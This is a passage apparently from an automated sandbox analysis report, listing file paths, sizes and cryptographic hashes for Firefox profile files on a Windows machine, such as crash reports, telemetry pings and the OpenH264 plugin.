SHA5123eaa1ebca8b9ad021342846040faf19c5ef420c319a9a649b31ffb9107b54d71f60f6e4372e0256f123b931f5c3dd11a34ad9c4ccb7d0a3c687a90ba50cd2102
-
Filesize
2.6MB
MD5985fef2b6872a1a94726dc3b7f1439de
SHA1e221a5c4f2f222b665c932ab9b1f66189cee3315
SHA25678ef7eacffaba55e653195fe37846375aeb51b164d80ad312afda54163da0622
SHA51241678a3e117cb83e7b99a65a6d0dda86db57ac0441d84ca817d6e04fa3751d4035215e8cd50bcd86b7232d1c28620103264f3a677ac14513d1fa0d977ba94f39
-
Filesize
7.3MB
MD5c9e6aa21979d5fc710f1f2e8226d9dfe
SHA1d881f97a1fe03f43bed2a9609eae65531cf710cf
SHA256a1a8cfcc74f8f96fd09115189defe07ac6fc2e85a9ff3b3ec9c6f454aede1c1d
SHA5129e90bcb64b0e1f03e05990cdead076b4c6e0b050932ecb953dae50b7e92b823a80fc66d1fd8753591719e89b405757b2bf7518814bc6a19bb745124d1a691627
-
Filesize
966B
MD5ebe0c297916aa1ff3ffd5f23d7d99472
SHA1e3b00142fe330bbf4ae96a81eaf6fe3136dbc09c
SHA2562a33259f63269310725001731ffa840ba756b86c7006746f369de31f256a7ab6
SHA512a853aba42366c715d61974a47d543c5b9ec1fcca33e70bf1ead1c1e4ff09530432d1fbb83ae693acf1148cd15ec455c556721d714d0401801398342d326f44f7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\pending\e098f18d-d929-465e-8913-8269e03af730.dmp
Filesize84KB
MD5eb8a4d1613fa2a00eb1d1d4c46454f6e
SHA1317fb4e228bc259ed387eefbb51d17bf04ba1522
SHA256423a8d7a695e9533e38eb931422fe2ae7c193d6a68c17ed749ecf95e5939a5c9
SHA5122f70d2ebfb7a6b2212beb332411cc1e655b1187e446bb8b5369d49985abc3242168b2ddf4c94aea503d21414aada4927467697c68baf1857c063ab0677a846dc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Crash Reports\pending\e098f18d-d929-465e-8913-8269e03af730.extra
Filesize12KB
MD50d8ad8b122b119f88971c102a201eb83
SHA138dad183636772a91a6e63805a0be73101a4b62a
SHA256c60128d9450bf61bcf45dc8a812d8d9beb8fe35789b399fe3ec5235915353ef6
SHA5120216baee6bd7394171c409f24dd18b13ef9942566a859af3ebfcc96a387cb47fbe97eccf0c6b87cdb130a2bacdaec870d2f73694b2eaf44fc69c6a4c7d99c8f1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\AlternateServices.bin
Filesize6KB
MD51c730e4a710bb510299428f8fef03416
SHA1040c8c4577354b529873a277b76609bc17bf0362
SHA256a2c5034d5c81f845e47a741e5ea84a03ebe66d89712fedc0950803138a055dd6
SHA512526079b51a42e667f9159b820d77efe28cc4b21243265fef7d639a163bf4b33471ced848030633d94d419d290759ae83b7c24ed913c489337d75b4701de39f0e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\AlternateServices.bin
Filesize7KB
MD516ea99b7ff6cf63b024d18c080371e2e
SHA1f40bcce4bfc13a0a5bca72fbd286cadf4a287d42
SHA2561e2850a29cebbcbba56d8627d6d42676c55406d56088f7855abb5612a1a2a07d
SHA512219c16929e6c531cdd7ad6549ef9627528a12841e5ae3a7175741eac483f6681017916c23cb05c2a0d59924fa82277828906147b09987d3f96fa595c287b054f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\AlternateServices.bin
Filesize11KB
MD5c105c36b8dd1d30ca138a6a38fbad913
SHA185d924a1b0e8436e60c7213f4d7e0fcf8a404821
SHA25636e32f4d1a393bc1a5884b7c7f23c75b4d460f5e0bfa5063156a8a7a6f63ac62
SHA512b898b2ae593f09d15c68979a60e9b61dfaa765ca4df92bc79824d029236e593e547c82068e76c805ea60be3ae18c86fd537a38ce9107954b0fff8eaaa13189b3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\crashes\store.json.mozlz4
Filesize6KB
MD55d23c527a64c9697f2b783acc3cdba24
SHA18c2ffefa2dd348822d1c8bb024c2821b6ff38d34
SHA256550d1362ecb752f3f4fdbaebc9f99269248c51c34631ecd9224de764b6622486
SHA51262d8aa9a1cea4edba893748bcf19cc02179f18383d4fdc028031a8f6e1ef44e8e5fb44d045c1aa8e00999a78cfe36671462e3d7e86fe7f396b375f7571ff4650
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\datareporting\glean\db\data.safe.tmp
Filesize21KB
MD522630a4e498c7a7abcf7efe273514266
SHA1f44f6d941394ef4bb75bb4b3d0d42919bc2fbacc
SHA256e3908aae14d25c29cb17be151656ed8a410037fcd17d8d104ec01adaa15c8cc4
SHA512bb76f702e2d23dd8b41b451e8edc5d59f0e38bddd3b56289f50d14c541037ae2448b430234b767952d8b51179d4e9fed822c62378c7139832ba9c04bd2c2d4cd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\datareporting\glean\db\data.safe.tmp
Filesize21KB
MD5d17f01aefd755887b4e3dae88daaaee5
SHA125d259934e1a6ce342672a2a67eb0a256c169586
SHA2561849766ea2c3947f80c003513d7e5430160595dd7072e5575f53f3475609f4a3
SHA5126ba96aecbac7d5dbe4f8bc9807671082bb3aaa5ce2d007629918eba2392dcdab044e371491b1595f88b1fb074f4c5ffc46a7f0d84bc81c97e303e3f088e05ea5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\datareporting\glean\db\data.safe.tmp
Filesize25KB
MD5043f2fcf2fdac7bdc5b485ab618b84fa
SHA1f2faccdf0f39e9557a95c31eda72db8cac1c12fe
SHA2569e74b5ce627870c84126a313ea2132b3652965570354b11f21712393ab349115
SHA512c903e0050a350dc4339218f2f6b3ce084f90b270f6b22e26c7655c6753ff2acc5d8b0e96e7113eefc78799863eee85ba8f1ada64af7b961380c7439104d65e27
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\datareporting\glean\pending_pings\07ccc0d6-d16d-43cd-b554-3db8e0626d48
Filesize772B
MD51c5a1d48c2928e3620c492a36873c790
SHA105160ed01317f082df2450ca23005c074ae49ada
SHA25690efc76e791b91961eb34daa42fb64be3dd76bc32d2c9ee2b45fd0bf4477bc5a
SHA51232330d7fc495778818bd04ad349ef4b9942d467b9cbe41bab0ff7a7fd3ed14604560df7f042ef1d09619d1ff95cea077c4de50384880eb894365e968277d0c2f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\datareporting\glean\pending_pings\2a773cbb-b2ea-41f9-a1cd-1475bc613472
Filesize982B
MD55a7ca8acee7bc3128c871985f4208858
SHA1e095042c18a50215796738ad6dfff2640c7d60e9
SHA256c149bda237a31f6b7da234f6e6b2a3a254a2ae9f4e0667acbad5e86271aebd65
SHA5126f0972906d24066091b35a16bc44705fc3a7a62dbafe56b209bc46be33dfe392a47f642b45f2b3b496d48d36dcf30ea3e9d6a21bddd0f793ff34408bcbb1851e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\datareporting\glean\pending_pings\8b5a0fa9-e896-4e0d-922f-b624a8624633
Filesize772B
MD538b579391d6f0db2fed93fc80f44583e
SHA1b021eb764210846e0b45e7a5d87c9c647e88cdd2
SHA256869b1baf2208a5c741b8472ea6e9a972a3ec0f5044df8c8cc259c37b5eb3e0b7
SHA5123c2e3dea40d94b608d27c033aa050dc3ec6c71b79fb9ebe8ce0abb6f7bb6ecbd6df7afb851f0e29512e22c17d0b89d270dd62375c72cf3d9888c7752e96fd2e2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\datareporting\glean\pending_pings\b3bc9467-3b7a-49ac-9918-a2b8b3810fa4
Filesize659B
MD55e7c15daffeb7d476472497d7cfeaffb
SHA15230d4690119efe511c56091a9a2d32351734ed1
SHA25670a58970fdfd1184b9554407666dc7eb9c8e73362c5d20bed60eafd38094a42d
SHA5122a9037d588636cd150d62582a667cadf2d7a3dd64435c98c52bd0140b48cf7bfacc9d57e9483d4e14934c762e515555e93cf5f33f7dd9c7d821207796a836836
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\datareporting\glean\pending_pings\fc686391-f6a7-4ec5-bf29-ec58e20d5fce
Filesize773B
MD52860d4ce936d077dbc582ce2e1530ce3
SHA1b977e96d657f341f7835998f0cef6f2f5fdeed88
SHA25682d20fa6824239b2916846a1360b9f47b6048a4b0d865e7e5de2a8edc4672af1
SHA512932920ee15ccddece12d4e63e60123bb9f499b6df8c1bd395ba0c32b90716d411804e96ca132812f46b146e0afa1d31b8b7775cf1349813228f8b5acb0891415
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize1.1MB
MD5842039753bf41fa5e11b3a1383061a87
SHA13e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize116B
MD52a461e9eb87fd1955cea740a3444ee7a
SHA1b10755914c713f5a4677494dbe8a686ed458c3c5
SHA2564107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA51234f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
Filesize
15KB
MD58977200ec0b2c0cb7f1472634ca05b94
SHA125fa6127e444104bc2dcf96035b7763d60bc824b
SHA25655d7eca513286236b503022b40b7fd91dc7a210f84c3a6b6c8a285ce62806f0a
SHA512d30075db0b14faffc3c72c07a1f1a37357ca77a79405bf4cfb19cbe5770f313fb05166c90e555c575db7610308ddde4b6f585ff97125fe82f0b35124aaad6c30
-
Filesize
11KB
MD547b00cc66a90368c2335d592cd09a0f7
SHA15f06f1b3eeab7e6e3dd711efb88984ffde539eb4
SHA2568275b6827bb07960c296a39e0effa1b694b7f296580ac1b4d35827d9c987041f
SHA512177b716942625fdaf940f41ee04179116916f886be439723e92087cde5d39b48adc06e84e1d1a94ebb9ee371a57a7dac8e4120561e52f2f6a575d5e364d43c39
-
Filesize
11KB
MD5b2488d62556d5911908748aaddae54e3
SHA17b3385c4c8dfd1e79c73104b79474312c57d9ca9
SHA2564504176d7e58ef98a55c82bcf36d756e9d9eead100f7918f55b6e33c24854844
SHA512f6166fabeb2a30c3ccdf288666bb3d50a383d3615498c129c31e67e7b4b180b017c263f86639ffb6e124a6b26911028fbb3a88ab9dcf7b48b93d46ddc5e63b07
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize1.9MB
MD59b6a4aabe1078234e8bca57c709d14a0
SHA1d9ddde62e8cdc69e9c1d1ad57e4491700f5830c1
SHA2569a9c56f1b3d08de6d5d66a23a1e651c3f0c2e13713c57ea722f630e56387c413
SHA5124bcbf37c23392b0a1f82ef7cef2a6e2f4400fb98376fc3ee7e5c6c1175dfc696937b9cecf3da644b66cd1d548043f72c2b3f47bf4ac8278b112adf09d11c98c2